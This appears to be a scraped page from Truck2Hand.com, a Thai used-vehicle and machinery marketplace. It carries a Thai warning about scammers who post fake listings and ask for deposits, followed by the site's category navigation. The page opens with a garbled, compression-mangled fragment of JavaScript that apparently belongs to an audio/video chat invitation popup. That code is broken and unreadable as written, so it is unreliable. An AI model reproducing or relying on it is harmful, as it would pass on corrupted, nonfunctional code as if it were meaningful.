\"!484px;background:url('`%R#www.2yourface`%R!Plugin/im`-!outer_bg.png');border-radius:8px;padding:9px;z-`(]!:1002;overflow: auto;\");`*$*`#j(b);}`+`'onUp`%r$isValidWebsite(`#g!`1,#`(^$new Date`*p'getTime() - m_las` *!ou`$c!` 4\"` I!c` T'(b`/%\"c.getMinutes() > 0 || ` '+== 0 &&` 1\"Second` G\"2) {`-!)`/#\"url`-\\&`+i)`!C!timeOut = 3000` .!gPhoneCall`.u!eMsgPrefix = \" i` /! You to an Audio Chat. Accept Now : `2`\"gVideo` GC ` H!` S6d`)]!`#j*cacheID =` 9!.get`#O!) + \"-\" + (` 0$Month` 4!1` 4&` 5$FullYear` N'` 3$Hours`$Q#`\"j/ =`\"x7+ \" `'Z4?date=\" +`!|$`\"y4 =`#,7` TJ`%B#s`&g\"out(\"`%j'\", 2500`\"E\"`'2)`#j(`(a*onmouseup =`([!;`2H#;"))
คำเตือน  คำเตือน!! โปรดใช้วิจารณญานในการอ่านประกาศ และตรวจสอบผู้ซื้อผู้ขายก่อนการทำธุรกรรมใดๆ ทุกครั้ง
เนื่องจากมีกลุ่มแก๊งต้มตุ๋นหลอกลวง แฝงตัวเข้ามาลงประกาศในเว็บไซต์ โดยการหลอกให้โอนเงินมัดจำ หรือหลอกให้ไปดูสินค้าโดยไม่มีสินค้า ทางเว็บไซต์ Truck2Hand.com เป็นแค่สื่อกลางในการให้บริการพื้นที่ในการฝากประกาศ ซื้อ-ขาย เท่านั้น ไม่มีส่วนเกี่ยวข้องใดๆ ในประกาศนี้ ดั้งนั้นจึงควรตรวจสอบสินค้าในประกาศนี้ รวมถึงผู้ลงประกาศอย่างรอบคอบ
"หากท่านไม่มั่นใจจริงๆ" อย่าโอนเงินให้ก่อนรับสินค้า ทุกกรณี มิเช่นนั้นท่านอาจเสียเงินฟรีได้

twitter สั่งซื้อรถ

ความคิดเห็นCounter:

ภาษา   th   gb   jp   arabic   cn   kr  


รถบรรทุก
รถบรรทุก
ประกาศซื้อขายรถบรรทุกมือสอง
เครื่องจักรกลหนัก
เครื่องจักรกลหนัก
ประกาศซื้อขายจักรกลหนักมือสอง
เครื่องจักรกลการเกษตร
เครื่องจักรกลเกษตร
ประกาศซื้อขายจักรกลเกษตรมือสอง
รถบัส
รถบัส
ประกาศซื้อขายรถโดยสารมือสอง
รถตู้
รถตู้
ประกาศซื้อขายรถตู้มือสอง
รถยนต์
รถยนต์
ประกาศซื้อขายรถยนต์มือสอง
รถกระบะ
รถกระบะ
ประกาศซื้อขายรถกระบะมือสอง
รถมอเตอร์ไซค์
รถมอเตอร์ไซค์
ประกาศซื้อขายรถมอเตอร์ไซค์มือสอง
เรือ
เรือ
ประกาศซื้อขายเรือมือสอง
อะไหล่
อะไหล่รถ
ประกาศซื้อขายอะไหล่รถมือสอง
ประดับยนต์
ประดับยนต์
ประกาศซื้อขายประดับยนต์มือสอง
อุปกรณ์
เครื่องจักร อุปกรณ์
ประกาศซื้อขายเครื่องจักรมือสอง
บริการ
บริการ
ประกาศบริการต่างๆ
งาน
งาน
ประกาศงานต่าง
อื่นๆ
ประกาศอื่นๆ
ประกาศซื้อขายของมือสองอื่นๆ
ทั้งหมด
ประกาศทั้งหมด
รายการประกาศทั้งหมด
ขายแล้ว
ซื้อขายแล้ว
รายการประกาศที่มีการซื้อขายแล้ว
ซื้อขายกลางอากาศ
ซื้อขายกลางอากาศ
ประกาศคุณภาพซื้อขายด้วยความไว้ใจ